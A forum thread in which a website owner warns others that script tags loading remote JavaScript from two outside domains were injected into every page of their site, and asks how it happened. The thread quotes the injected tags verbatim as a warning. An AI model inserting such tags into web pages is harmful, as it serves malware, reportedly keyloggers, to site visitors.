raydar

I'm not sure if this is the best place to put this, but I just wanted to give a heads up on a new (or old?) bug that's going around. I just got an email from Google Search Quality informing me that "We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com. "

I went to my pages, and lo and behold, there are two pieces of script that were inserted onto EVERY .html and .php file, right before the </body> tag.

I'm posting the hacked code here, so you can see the file and the format *PLEASE DO NOT CLICK* <script src=http://www.loopadd.com/fgg.js></script><script src=http://www.gitporg.com/fgg.js></script>

After some research, it looks like a lot of these scripts attempt to install keylogging software to try and steal your info. It also seems like they get in through forms where you can upload things and SQL databases.

I have no idea how it was able go infect my site since my only form is a basic email contact form and I don't have SQL database (if anyone has any ideas, I'd love to hear them.) I contacted the hosting company and was told that they haven't had any problems on their side.

Fortunately I have a clean version of my website on my local computer, so the hosting company thinks that uploading the new version will make the problem go away. Keeping my fingers crossed that this will work and I can get Google to unflag me.

Just please be aware that this hack is being spread & be careful.

Please register or log-in into NamePros to hide ads

__________________
www.creativepatience.com

nasaboy007

a headsup is always appreciated.

i dont know how they could edit your files like that without actual access to the files (meaning potentially compromised ftp/etc). im not sure but cross-site-scripting MIGHT fall under these categories but im not sure if XSS will keep the code permanently in the hacked page (if that's even possible).

do you sanitize the input that you have for the contact form? (strip_tags, addslashes, etc)

__________________

raydar

I did change my .ftp password right away.

I'm not sure about sanitizing the contact form - I got the template from chfeedback.php (since this sort of code isn't really my forte). Do you know what code I should be adding to make sure nothing fishy is getting through it? I do see an
"if (get_magic_quotes_gpc()) {
$comments = stripslashes( $comments );
}" in the .php file.

Thanks.

__________________
www.creativepatience.com